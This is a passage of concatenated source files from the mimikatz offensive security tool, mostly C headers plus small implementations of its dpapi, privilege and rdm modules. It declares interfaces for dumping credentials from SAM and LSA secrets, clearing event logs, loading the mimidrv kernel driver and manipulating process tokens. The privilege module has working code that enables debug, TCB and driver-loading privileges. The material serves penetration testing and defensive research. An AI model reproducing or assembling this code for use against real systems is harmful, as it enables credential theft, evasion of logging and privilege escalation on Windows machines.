6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_busylight.h"
9 | #include "../modules/kull_m_string.h"
10 |
11 | const KUHL_M kuhl_m_busylight;
12 |
13 | NTSTATUS kuhl_m_busylight_init();
14 | NTSTATUS kuhl_m_busylight_clean();
15 |
16 | NTSTATUS kuhl_m_busylight_status(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_busylight_list(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_busylight_off(int argc, wchar_t * argv[]);
19 | NTSTATUS kuhl_m_busylight_single(int argc, wchar_t * argv[]);
20 |
21 | NTSTATUS kuhl_m_busylight_test(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_dpapi.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | http://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : http://creativecommons.org/licenses/by/3.0/fr/
5 | */
6 | #include "kuhl_m_dpapi.h"
7 |
8 | const KUHL_M_C kuhl_m_c_dpapi[] = {
9 | {kuhl_m_dpapi_masterkeys, L"masterkeys", L""},
10 | };
11 | const KUHL_M kuhl_m_dpapi = {
12 | L"dpapi", L"", NULL,
13 | ARRAYSIZE(kuhl_m_c_dpapi), kuhl_m_c_dpapi, NULL, NULL
14 | };
15 |
16 | NTSTATUS kuhl_m_dpapi_masterkeys(int argc, wchar_t * argv[])
17 | {
18 | PKULL_M_DPAPI_MASTERKEYS masterkeys;
19 | PBYTE buffer;
20 | DWORD szBuffer;
21 |
22 | if(argc && kull_m_file_readData(argv[0], &buffer, &szBuffer))
23 | {
24 | if(masterkeys = kull_m_dpapi_masterkeys_create(buffer))
25 | {
26 | kull_m_dpapi_masterkeys_descr(masterkeys);
27 | kull_m_dpapi_masterkeys_delete(masterkeys);
28 | }
29 | LocalFree(buffer);
30 | }
31 | return STATUS_SUCCESS;
32 | }
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_dpapi.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | http://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : http://creativecommons.org/licenses/by/3.0/fr/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_file.h"
9 | #include "../modules/kull_m_dpapi.h"
10 |
11 | const KUHL_M kuhl_m_dpapi;
12 |
13 | NTSTATUS kuhl_m_dpapi_masterkeys(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_event.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_process.h"
9 | #include "../modules/kull_m_service.h"
10 | #include "../modules/kull_m_memory.h"
11 | #include "../modules/kull_m_patch.h"
12 |
13 | const KUHL_M kuhl_m_event;
14 |
15 | NTSTATUS kuhl_m_event_drop(int argc, wchar_t * argv[]);
16 | NTSTATUS kuhl_m_event_clear(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_iis.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_crypto.h"
9 | #include "../modules/kull_m_xml.h"
10 | #include "../modules/kull_m_file.h"
11 |
12 | const KUHL_M kuhl_m_iis;
13 |
14 | NTSTATUS kuhl_m_iis_apphost(int argc, wchar_t * argv[]);
15 |
16 |
17 | typedef enum _IISXMLType {
18 | IISXMLType_Providers,
19 | IISXMLType_ApplicationPools,
20 | IISXMLType_Sites,
21 | } IISXMLType;
22 |
23 | void kuhl_m_iis_apphost_genericEnumNodes(int argc, wchar_t * argv[], IXMLDOMDocument *pXMLDom, PCWSTR path, IISXMLType xmltype, LPCWSTR provider, LPCBYTE data, DWORD szData);
24 | BOOL kuhl_m_iis_apphost_provider(int argc, wchar_t * argv[], IXMLDOMDocument *pXMLDom, IXMLDOMNode *pNode, LPCWSTR provider, LPCBYTE data, DWORD szData);
25 | void kuhl_m_iis_apphost_apppool(int argc, wchar_t * argv[], IXMLDOMDocument *pXMLDom, IXMLDOMNode *pNode);
26 | void kuhl_m_iis_apphost_site(int argc, wchar_t * argv[], IXMLDOMDocument *pXMLDom, IXMLDOMNode *pNode);
27 |
28 | void kuhl_m_iis_maybeEncrypted(int argc, wchar_t * argv[], IXMLDOMDocument *pXMLDom, PCWSTR password);
29 | void kuhl_m_iis_apphost_provider_decrypt(int argc, wchar_t * argv[], PCWSTR keyContainerName, BOOL isMachine, LPCBYTE sessionKey, DWORD szSessionKey, LPCBYTE data, DWORD szData);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_kernel.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_kernel.h"
9 | #include "../modules/kull_m_process.h"
10 | #include "../modules/kull_m_service.h"
11 | #include "../modules/kull_m_file.h"
12 | #include "../modules/kull_m_string.h"
13 | #include "kuhl_m_sysenvvalue.h"
14 |
15 | typedef struct _KUHL_K_C {
16 | const PKUHL_M_C_FUNC pCommand;
17 | const DWORD ioctlCode;
18 | const wchar_t * command;
19 | const wchar_t * description;
20 | } KUHL_K_C, *PKUHL_K_C;
21 |
22 | NTSTATUS kuhl_m_kernel_do(wchar_t * input);
23 |
24 | NTSTATUS kuhl_m_kernel_add_mimidrv(int argc, wchar_t * argv[]);
25 | NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[]);
26 |
27 | NTSTATUS kuhl_m_kernel_processProtect(int argc, wchar_t * argv[]);
28 | NTSTATUS kuhl_m_kernel_processToken(int argc, wchar_t * argv[]);
29 | NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[]);
30 | NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[]);
31 | NTSTATUS kuhl_m_kernel_sysenv_del(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_lsadump_remote.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m_lsadump.h"
8 | #include "../modules/kull_m_remotelib.h"
9 |
10 | typedef struct _KIWI_SAMPR_USER_INTERNAL42_INFORMATION {
11 | SAMPR_USER_INTERNAL1_INFORMATION Internal1;
12 | DWORD cbPrivate;
13 | BYTE Private[ANYSIZE_ARRAY];
14 | } KIWI_SAMPR_USER_INTERNAL42_INFORMATION, *PKIWI_SAMPR_USER_INTERNAL42_INFORMATION;
15 |
16 | typedef NTSTATUS (WINAPI * PLSAIQUERYINFORMATIONPOLICYTRUSTED) (IN POLICY_INFORMATION_CLASS InformationClass, OUT PVOID *Buffer);
17 | typedef VOID (WINAPI * PLSAIFREE_LSAPR_POLICY_INFORMATION) (IN POLICY_INFORMATION_CLASS InformationClass, IN PVOID Buffer);
18 |
19 | typedef NTSTATUS (WINAPI * PSAMICONNECT) (IN PUNICODE_STRING ServerName, OUT SAMPR_HANDLE * ServerHandle, IN ACCESS_MASK DesiredAccess, IN BOOLEAN Trusted);
20 | typedef NTSTATUS (WINAPI * PSAMRCLOSEHANDLE) (IN SAMPR_HANDLE SamHandle);
21 | typedef NTSTATUS (WINAPI * PSAMIRETRIEVEPRIMARYCREDENTIALS) (IN SAMPR_HANDLE UserHandle, IN LSA_UNICODE_STRING *Name, OUT LPVOID *Buffer, OUT DWORD *BufferSize);
22 | typedef NTSTATUS (WINAPI * PSAMIGETPRIVATEDATA) (IN SAMPR_HANDLE UserHandle, IN PDWORD DataType, OUT DWORD *unk, OUT DWORD *BufferSize, OUT struct _KIWI_LSA_PRIVATE_DATA **Buffer);
23 |
24 | typedef NTSTATUS (WINAPI * PSAMROPENDOMAIN) (IN SAMPR_HANDLE SamHandle, IN ACCESS_MASK DesiredAccess, IN PSID DomainId, OUT SAMPR_HANDLE *DomainHandle);
25 | typedef NTSTATUS (WINAPI * PSAMROPENUSER) (IN SAMPR_HANDLE DomainHandle, IN ACCESS_MASK DesiredAccess, IN DWORD UserId, OUT SAMPR_HANDLE *UserHandle);
26 | typedef NTSTATUS (WINAPI * PSAMRQUERYINFORMATIONUSER) (IN SAMPR_HANDLE UserHandle, IN USER_INFORMATION_CLASS UserInformationClass, OUT PSAMPR_USER_INFO_BUFFER *Buffer);
27 | typedef VOID (WINAPI * PSAMIFREE_SAMPR_USER_INFO_BUFFER) (IN PSAMPR_USER_INFO_BUFFER, IN USER_INFORMATION_CLASS UserInformationClass);
28 |
29 | typedef LPVOID (WINAPI * PVIRTUALALLOC) (__in_opt LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flAllocationType, __in DWORD flProtect);
30 | typedef HLOCAL (WINAPI * PLOCALALLOC) (__in UINT uFlags, __in SIZE_T uBytes);
31 | typedef HLOCAL (WINAPI * PLOCALFREE) (__deref HLOCAL hMem);
32 | typedef PVOID (__cdecl * PMEMCPY) (__out_bcount_full_opt(_MaxCount) void * _Dst, __in_bcount_opt(_MaxCount) const void * _Src, __in size_t _MaxCount);
33 |
34 | typedef NTSTATUS (NTAPI * PLSAOPENPOLICY) (__in_opt PLSA_UNICODE_STRING SystemName, __in PLSA_OBJECT_ATTRIBUTES ObjectAttributes, __in ACCESS_MASK DesiredAccess, __out PLSA_HANDLE PolicyHandle);
35 | typedef NTSTATUS (NTAPI * PLSACLOSE) (__in LSA_HANDLE ObjectHandle);
36 | typedef NTSTATUS (NTAPI * PLSAFREEMEMORY) (__in_opt PVOID Buffer);
37 | typedef NTSTATUS (NTAPI * PLSARETRIEVEPRIVATEDATA) (__in LSA_HANDLE PolicyHandle, __in PLSA_UNICODE_STRING KeyName, __out PLSA_UNICODE_STRING * PrivateData);
38 |
39 | DWORD WINAPI kuhl_sekurlsa_samsrv_thread(PREMOTE_LIB_DATA lpParameter);
40 | DWORD kuhl_sekurlsa_samsrv_thread_end();
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_minesweeper.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_process.h"
9 |
10 | const KUHL_M kuhl_m_minesweeper;
11 |
12 | NTSTATUS kuhl_m_minesweeper_infos(int argc, wchar_t * argv[]);
13 | NTSTATUS kuhl_m_minesweeper_bsod(int argc, wchar_t * argv[]);
14 |
15 | typedef struct _STRUCT_MINESWEEPER_REF_ELEMENT {
16 | DWORD cbElements;
17 | DWORD unk0;
18 | DWORD unk1;
19 | PVOID elements;
20 | DWORD unk2;
21 | DWORD unk3;
22 | } STRUCT_MINESWEEPER_REF_ELEMENT, *PSTRUCT_MINESWEEPER_REF_ELEMENT;
23 |
24 | typedef struct _STRUCT_MINESWEEPER_BOARD {
25 | PVOID Serializer;
26 | DWORD cbMines;
27 | DWORD cbRows;
28 | DWORD cbColumns;
29 | DWORD unk0;
30 | DWORD unk1;
31 | DWORD unk2;
32 | DWORD unk3;
33 | DWORD unk4;
34 | DWORD unk5;
35 | DWORD unk6;
36 | DWORD unk7;
37 | DWORD unk8;
38 | DWORD unk9;
39 | PVOID unk10;
40 | PVOID unk11;
41 | PSTRUCT_MINESWEEPER_REF_ELEMENT ref_visibles;
42 | PSTRUCT_MINESWEEPER_REF_ELEMENT ref_mines;
43 | DWORD unk12;
44 | DWORD unk13;
45 | } STRUCT_MINESWEEPER_BOARD, *PSTRUCT_MINESWEEPER_BOARD;
46 |
47 | typedef struct _STRUCT_MINESWEEPER_GAME {
48 | PVOID Serializer;
49 | //PVOID pGameStat; on 7x86
50 | PVOID pNodeBase;
51 | PVOID pBoardCanvas;
52 | PSTRUCT_MINESWEEPER_BOARD pBoard;
53 | PSTRUCT_MINESWEEPER_BOARD pBoard_WIN7x86;
54 | } STRUCT_MINESWEEPER_GAME, *PSTRUCT_MINESWEEPER_GAME;
55 |
56 | void kuhl_m_minesweeper_infos_parseField(PKULL_M_MEMORY_HANDLE hMemory, PSTRUCT_MINESWEEPER_REF_ELEMENT base, CHAR ** field, BOOL isVisible);
57 | //
58 | //void __fastcall kuhl_m_minesweeper_bsod_thread(PVOID a, INT b, INT c, BOOL d);
59 | //DWORD kuhl_m_minesweeper_bsod_thread_end();
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_net.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/mimikatz/modules/kuhl_m_net.c
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_net.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "lsadump/kuhl_m_lsadump_dc.h"
9 | #include "../../modules/kull_m_ldap.h"
10 | #include "../../modules/kull_m_net.h"
11 | #include "../../modules/kull_m_token.h"
12 | #include "../../modules/rpc/kull_m_rpc_ms-dcom_IObjectExporter.h"
13 | #include <WinDNS.h>
14 |
15 | const KUHL_M kuhl_m_net;
16 |
17 | NTSTATUS kuhl_m_net_user(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_net_group(int argc, wchar_t * argv[]);
19 | NTSTATUS kuhl_m_net_alias(int argc, wchar_t * argv[]);
20 |
21 | void kuhl_m_net_simpleLookup(SAMPR_HANDLE hDomainHandle, DWORD rid);
22 |
23 | NTSTATUS kuhl_m_net_autoda(int argc, wchar_t * argv[]);
24 | NTSTATUS kuhl_m_net_session(int argc, wchar_t * argv[]);
25 | NTSTATUS kuhl_m_net_wsession(int argc, wchar_t * argv[]);
26 | NTSTATUS kuhl_m_net_tod(int argc, wchar_t * argv[]);
27 | NTSTATUS kuhl_m_net_stats(int argc, wchar_t * argv[]);
28 |
29 | void kuhl_m_net_share_type(DWORD type);
30 |
31 | NTSTATUS kuhl_m_net_share(int argc, wchar_t * argv[]);
32 | NTSTATUS kuhl_m_net_serverinfo(int argc, wchar_t * argv[]);
33 |
34 | NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[]);
35 | NTSTATUS kuhl_m_net_deleg(int argc, wchar_t * argv[]);
36 | NTSTATUS kuhl_m_net_dcom_if(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_privilege.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kuhl_m_privilege.h"
7 |
8 | const KUHL_M_C kuhl_m_c_privilege[] = {
9 | {kuhl_m_privilege_debug, L"debug", L"Ask debug privilege"},
10 | {kuhl_m_privilege_driver, L"driver", L"Ask load driver privilege"},
11 | {kuhl_m_privilege_security, L"security", L"Ask security privilege"},
12 | {kuhl_m_privilege_tcb, L"tcb", L"Ask tcb privilege"},
13 | {kuhl_m_privilege_backup, L"backup", L"Ask backup privilege"},
14 | {kuhl_m_privilege_restore, L"restore", L"Ask restore privilege"},
15 | {kuhl_m_privilege_sysenv, L"sysenv", L"Ask system environment privilege"},
16 |
17 | {kuhl_m_privilege_id, L"id", L"Ask a privilege by its id"},
18 | {kuhl_m_privilege_name, L"name", L"Ask a privilege by its name"},
19 | };
20 |
21 | const KUHL_M kuhl_m_privilege = {
22 | L"privilege", L"Privilege module", NULL,
23 | ARRAYSIZE(kuhl_m_c_privilege), kuhl_m_c_privilege, NULL, NULL
24 | };
25 |
26 | NTSTATUS kuhl_m_privilege_simple(ULONG privId)
27 | {
28 | ULONG previousState;
29 | NTSTATUS status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState);
30 | if(NT_SUCCESS(status))
31 | kprintf(L"Privilege \'%u\' OK\n", privId);
32 | else PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);
33 | return status;
34 | }
35 |
36 | NTSTATUS kuhl_m_privilege_id(int argc, wchar_t * argv[])
37 | {
38 | NTSTATUS status = STATUS_INVALID_PARAMETER;
39 | if(argc)
40 | status = kuhl_m_privilege_simple(wcstoul(argv[0], NULL, 0));
41 | else PRINT_ERROR(L"Missing \'id\'\n");
42 | return status;
43 | }
44 |
45 | NTSTATUS kuhl_m_privilege_name(int argc, wchar_t * argv[])
46 | {
47 | NTSTATUS status = STATUS_INVALID_PARAMETER;
48 | LUID luid;
49 | if(argc)
50 | {
51 | if(LookupPrivilegeValue(NULL, argv[0], &luid))
52 | {
53 | if(!luid.HighPart)
54 | status = kuhl_m_privilege_simple(luid.LowPart);
55 | else PRINT_ERROR(L"LUID high part is %u\n", luid.HighPart);
56 | }
57 | else PRINT_ERROR_AUTO(L"LookupPrivilegeValue");
58 | }
59 | else PRINT_ERROR(L"Missing \'name\'\n");
60 | return status;
61 | }
62 |
63 | NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[])
64 | {
65 | return kuhl_m_privilege_simple(SE_DEBUG);
66 | }
67 |
68 | NTSTATUS kuhl_m_privilege_driver(int argc, wchar_t * argv[])
69 | {
70 | return kuhl_m_privilege_simple(SE_LOAD_DRIVER);
71 | }
72 |
73 | NTSTATUS kuhl_m_privilege_security(int argc, wchar_t * argv[])
74 | {
75 | return kuhl_m_privilege_simple(SE_SECURITY);
76 | }
77 |
78 | NTSTATUS kuhl_m_privilege_tcb(int argc, wchar_t * argv[])
79 | {
80 | return kuhl_m_privilege_simple(SE_TCB);
81 | }
82 | NTSTATUS kuhl_m_privilege_backup(int argc, wchar_t * argv[])
83 | {
84 | return kuhl_m_privilege_simple(SE_BACKUP);
85 | }
86 |
87 | NTSTATUS kuhl_m_privilege_restore(int argc, wchar_t * argv[])
88 | {
89 | return kuhl_m_privilege_simple(SE_RESTORE);
90 | }
91 |
92 | NTSTATUS kuhl_m_privilege_sysenv(int argc, wchar_t * argv[])
93 | {
94 | return kuhl_m_privilege_simple(SE_SYSTEM_ENVIRONMENT);
95 | }
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_privilege.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_process.h"
9 |
10 | const KUHL_M kuhl_m_privilege;
11 |
12 | NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[]);
13 | NTSTATUS kuhl_m_privilege_driver(int argc, wchar_t * argv[]);
14 | NTSTATUS kuhl_m_privilege_security(int argc, wchar_t * argv[]);
15 | NTSTATUS kuhl_m_privilege_tcb(int argc, wchar_t * argv[]);
16 | NTSTATUS kuhl_m_privilege_backup(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_privilege_restore(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_privilege_sysenv(int argc, wchar_t * argv[]);
19 |
20 | NTSTATUS kuhl_m_privilege_id(int argc, wchar_t * argv[]);
21 | NTSTATUS kuhl_m_privilege_name(int argc, wchar_t * argv[]);
22 |
23 | NTSTATUS kuhl_m_privilege_simple(ULONG privId);
24 |
25 | #define SE_CREATE_TOKEN 2
26 | #define SE_ASSIGNPRIMARYTOKEN 3
27 | #define SE_LOCK_MEMORY 4
28 | #define SE_INCREASE_QUOTA 5
29 | #define SE_UNSOLICITED_INPUT 6
30 | #define SE_TCB 7
31 | #define SE_SECURITY 8
32 | #define SE_TAKE_OWNERSHIP 9
33 | #define SE_LOAD_DRIVER 10
34 | #define SE_SYSTEM_PROFILE 11
35 | #define SE_SYSTEMTIME 12
36 | #define SE_PROF_SINGLE_PROCESS 13
37 | #define SE_INC_BASE_PRIORITY 14
38 | #define SE_CREATE_PAGEFILE 15
39 | #define SE_CREATE_PERMANENT 16
40 | #define SE_BACKUP 17
41 | #define SE_RESTORE 18
42 | #define SE_SHUTDOWN 19
43 | #define SE_DEBUG 20
44 | #define SE_AUDIT 21
45 | #define SE_SYSTEM_ENVIRONMENT 22
46 | #define SE_CHANGE_NOTIFY 23
47 | #define SE_REMOTE_SHUTDOWN 24
48 | #define SE_UNDOCK 25
49 | #define SE_SYNC_AGENT 26
50 | #define SE_ENABLE_DELEGATION 27
51 | #define SE_MANAGE_VOLUME 28
52 | #define SE_IMPERSONATE 29
53 | #define SE_CREATE_GLOBAL 30
54 | #define SE_TRUSTED_CREDMAN_ACCESS 31
55 | #define SE_RELABEL 32
56 | #define SE_INC_WORKING_SET 33
57 | #define SE_TIME_ZONE 34
58 | #define SE_CREATE_SYMBOLIC_LINK 35
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_process.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_process.h"
9 | #include "kuhl_m_token.h"
10 |
11 | const KUHL_M kuhl_m_process;
12 |
13 | typedef BOOL (WINAPI * PINITIALIZEPROCTHREADATTRIBUTELIST) (__out_xcount_opt(*lpSize) LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, __in DWORD dwAttributeCount, __reserved DWORD dwFlags, __inout PSIZE_T lpSize);
14 | typedef VOID (WINAPI * PDELETEPROCTHREADATTRIBUTELIST) (__inout LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList);
15 | typedef BOOL (WINAPI * PUPDATEPROCTHREADATTRIBUTE) (__inout LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, __in DWORD dwFlags, __in DWORD_PTR Attribute, __in_bcount_opt(cbSize) PVOID lpValue, __in SIZE_T cbSize, __out_bcount_opt(cbSize) PVOID lpPreviousValue, __in_opt PSIZE_T lpReturnSize);
16 |
17 | typedef enum _KUHL_M_PROCESS_GENERICOPERATION {
18 | KUHL_M_PROCESS_GENERICOPERATION_TERMINATE,
19 | KUHL_M_PROCESS_GENERICOPERATION_SUSPEND,
20 | KUHL_M_PROCESS_GENERICOPERATION_RESUME,
21 | } KUHL_M_PROCESS_GENERICOPERATION, *PKUHL_M_PROCESS_GENERICOPERATION;
22 |
23 | NTSTATUS kuhl_m_process_genericOperation(int argc, wchar_t * argv[], KUHL_M_PROCESS_GENERICOPERATION operation);
24 |
25 | NTSTATUS kuhl_m_process_list(int argc, wchar_t * argv[]);
26 | BOOL CALLBACK kuhl_m_process_list_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
27 |
28 | NTSTATUS kuhl_m_process_callbackProcess(int argc, wchar_t * argv[], PKULL_M_MODULE_ENUM_CALLBACK callback);
29 |
30 | NTSTATUS kuhl_m_process_exports(int argc, wchar_t * argv[]);
31 | BOOL CALLBACK kuhl_m_process_exports_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
32 | BOOL CALLBACK kuhl_m_process_exports_callback_module_exportedEntry(PKULL_M_PROCESS_EXPORTED_ENTRY pExportedEntryInformations, PVOID pvArg);
33 |
34 | NTSTATUS kuhl_m_process_imports(int argc, wchar_t * argv[]);
35 | BOOL CALLBACK kuhl_m_process_imports_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
36 | BOOL CALLBACK kuhl_m_process_imports_callback_module_importedEntry(PKULL_M_PROCESS_IMPORTED_ENTRY pImportedEntryInformations, PVOID pvArg);
37 |
38 | NTSTATUS kuhl_m_process_start(int argc, wchar_t * argv[]);
39 | NTSTATUS kuhl_m_process_stop(int argc, wchar_t * argv[]);
40 | NTSTATUS kuhl_m_process_suspend(int argc, wchar_t * argv[]);
41 | NTSTATUS kuhl_m_process_resume(int argc, wchar_t * argv[]);
42 |
43 | BOOL kull_m_process_run_data(LPCWSTR commandLine, HANDLE hToken);
44 | NTSTATUS kuhl_m_process_run(int argc, wchar_t * argv[]);
45 | NTSTATUS kuhl_m_process_runParent(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_rdm.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kuhl_m_rdm.h"
7 |
8 | const KUHL_M_C kuhl_m_c_rdm[] = {
9 | {kuhl_m_rdm_version, L"version", NULL},
10 | {kuhl_m_rdm_list, L"list", NULL},
11 | };
12 | const KUHL_M kuhl_m_rdm = {
13 | L"rdm", L"RF module for RDM(830 AL) device", NULL,
14 | ARRAYSIZE(kuhl_m_c_rdm), kuhl_m_c_rdm, NULL, NULL
15 | };
16 |
17 | NTSTATUS kuhl_m_rdm_version(int argc, wchar_t * argv[])
18 | {
19 | PRDM_DEVICE devices, cur;
20 | ULONG count;
21 | PSTR version;
22 |
23 | if(rdm_devices_get(&devices, &count))
24 | {
25 | for(cur = devices; cur; cur = cur->next)
26 | {
27 | kprintf(L"[%3u] ", cur->id);
28 | if(rdm_get_version(cur->hDevice, &version))
29 | {
30 | kprintf(L"%S\n", version);
31 | LocalFree(version);
32 | }
33 | }
34 | rdm_devices_free(devices);
35 | }
36 | else PRINT_ERROR(L"No device found\n");
37 | return STATUS_SUCCESS;
38 | }
39 |
40 |
41 | NTSTATUS kuhl_m_rdm_list(int argc, wchar_t * argv[])
42 | {
43 | PRDM_DEVICE devices, cur;
44 | ULONG count;
45 | if(rdm_devices_get(&devices, &count))
46 | {
47 | for(cur = devices; cur; cur = cur->next)
48 | kprintf(L"\n[%3u] %s\n Vendor: 0x%04x, Product: 0x%04x, Version: 0x%04x\n", cur->id, cur->DevicePath, cur->hidAttributes.VendorID, cur->hidAttributes.ProductID, cur->hidAttributes.VersionNumber);
49 | rdm_devices_free(devices);
50 | }
51 | else PRINT_ERROR(L"No device found\n");
52 | return STATUS_SUCCESS;
53 | }
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_rdm.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../../modules/kull_m_rdm.h"
9 |
10 | const KUHL_M kuhl_m_rdm;
11 |
12 | NTSTATUS kuhl_m_rdm_version(int argc, wchar_t * argv[]);
13 | NTSTATUS kuhl_m_rdm_list(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_rpc.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../mimikatz.h"
9 | #include "../../modules/rpc/kull_m_rpc_mimicom.h"
10 |
11 | const KUHL_M kuhl_m_rpc;
12 |
13 | NTSTATUS kuhl_m_c_rpc_init();
14 | NTSTATUS kuhl_m_c_rpc_clean();
15 |
16 | NTSTATUS kuhl_m_rpc_server(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_rpc_connect(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_rpc_enum(int argc, wchar_t * argv[]);
19 |
20 | NTSTATUS kuhl_m_rpc_close(int argc, wchar_t * argv[]);
21 |
22 | NTSTATUS kuhl_m_rpc_do(wchar_t * input);
23 |
24 | typedef struct _KUHL_M_RPC_SERVER_INF {
25 | PWSTR szProtSeq;
26 | PWSTR szEndpoint;
27 | PWSTR szService;
28 | BOOL publishMe;
29 | RPC_IF_HANDLE srvif;
30 | DWORD AuthnSvc;
31 | DWORD flags;
32 | RPC_IF_CALLBACK_FN *sec;
33 | } KUHL_M_RPC_SERVER_INF, *PKUHL_M_RPC_SERVER_INF;
34 |
35 |
36 | //DWORD WINAPI kuhl_m_rpc_server_start(LPVOID lpThreadParameter);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_service.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_service.h"
9 | #include "../modules/kull_m_file.h"
10 | #include "kuhl_m_service_remote.h"
11 |
12 | const KUHL_M kuhl_m_service;
13 |
